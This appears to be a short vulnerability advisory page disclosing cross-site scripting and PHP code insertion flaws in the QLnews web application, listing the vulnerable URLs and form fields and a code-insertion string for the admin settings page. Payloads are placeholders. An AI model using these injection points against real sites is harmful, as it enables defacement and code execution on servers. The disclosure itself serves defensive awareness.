PoC/Exploit for XSS and PHP Code Insertion Vulnerabilities in QLnews

Published Proof of Concept code - XSS and PHP Code Insertion Vulnerabilities in QLnews.

Description
Available
Solution
Not available - check vendor's website

1. Cross-Site Scripting Example.

URL: http://[host]/qlnews/news.php?a=write&nr=1&opcja=1&wybor=1

Autor: [XSS]

Tresc: [XSS]

2. PHP Code Insertion Example.

URL: http://[host]/qlnews/admin.php?a=settings

Number of news on main page: 5"; [php_code] $aa="

Order Source Code Analysis

Protect against hacker attacks by source code testing of your website made by Aliaksandr Hartsuyeu.The order will be done by specialists in web application security.

Advisories by vuln type